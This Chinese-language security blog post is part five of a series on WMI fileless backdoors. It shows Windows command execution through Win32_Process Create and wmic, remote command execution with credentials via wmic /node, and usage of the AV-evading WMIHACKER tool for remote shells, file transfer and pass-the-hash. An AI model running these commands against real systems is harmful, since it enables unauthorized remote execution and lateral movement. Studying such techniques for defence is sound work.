【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

admin 2023年11月20日23:30:33评论11 views字数 1958阅读6分31秒阅读模式



【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

免责声明

【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。



【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

WMI无回显命令执行

【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

Win32_Process类中有个Create方法,可以启动新的进程。比如我们弹出一个计算器:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe"

【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

在这个命令中,Invoke-WmiMethod是用来调用WMI类方法的PowerShell命令,-Class参数是类的名称,-Name参数是要调用的方法名,-ArgumentList参数是传给这个方法的参数。

当然,也可以通过wmic命令进行命令执行:

WMIC Process Call Create "cmd /c calc.exe"

【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动




【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

WMI横向移动

【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

大多数 Windows 系统自带wmic命令而wmic命令是允许远程执行命令的,如果目标端口开放 135 端口,且允许随机一个高位端口进行通信。那么就可以通过以下命令对远程机器进行远程命令执行:

wmic /node:192.168.1.158 /user:fatmo /password:admin123  process call create "cmd.exe /c ipconfig>d:result.txt"




【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

工具推荐:WMIHACKER

【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

WMIHACKER是一个免杀的,通过WMI进行横向移动命令执行测试工具(无需445端口)。主要功能为:1、命令执行;2、文件上传;3、文件下载;4、PTH使用。传送门:https://github.com/rootclay/WMIHACKER

使用方法:

C:UsersadministratorDesktop>cscript //nologo WMIHACKER_0.6.vbs
__ ____ __ _____ _ _ _____ _ ________ _____ / / / |_ _| | | | | / / ____| |/ / ____| __ / / /| / | | | | |__| | / | | | ' /| |__ | |__) | / / / | |/| | | | | __ | / / | | | < | __| | _ / / / | | | |_| |_ | | | |/ ____ |____| . | |____| | / / |_| |_|_____| |_| |_/_/ ______|_|_______|_| _ v0.6beta By. Xiangshan@360RedTeamUsage: WMIHACKER.vbs /cmd host user pass command GETRES?
WMIHACKER.vbs /shell host user pass
WMIHACKER.vbs /upload host user pass localpath remotepath
WMIHACKER.vbs /download host user pass localpath remotepath
/cmd single command mode host hostname or IP address GETRES? Res Need Or Not, Use 1 Or 0 command the command to run on remote host
  • 有命令回显执行方式
cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1
  • 无命令回显
cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:1.txt" 0
  • 模拟shell模式
cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"
  • 文件上传-复制本机calc.exe到远程主机c:calc.exe
cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:windowssystem32calc.exe" "c:calc"
  • 文件下载-下载远程主机calc.exe到本地c:calc.exe
cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:calc" "c:windowssystem32calc.exe"


【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

总结

【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

本章我们讲述了利用WMI进行无回显命令执行和横向移动的方法,如果目标机器开放了135端口且允许高位端口连接即可进行横向移动。下一章我们将讲述WMI如何与PowerShell配合实现无回显后门。

【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动



原文始发于微信公众号(赛博安全狗):【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月20日23:30:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【权限维持技术】Windows: WMI 无文件后门(五) —— 命令执行与横向移动http://cn-sec.com/archives/2220141.html

发表评论

匿名网友 填写信息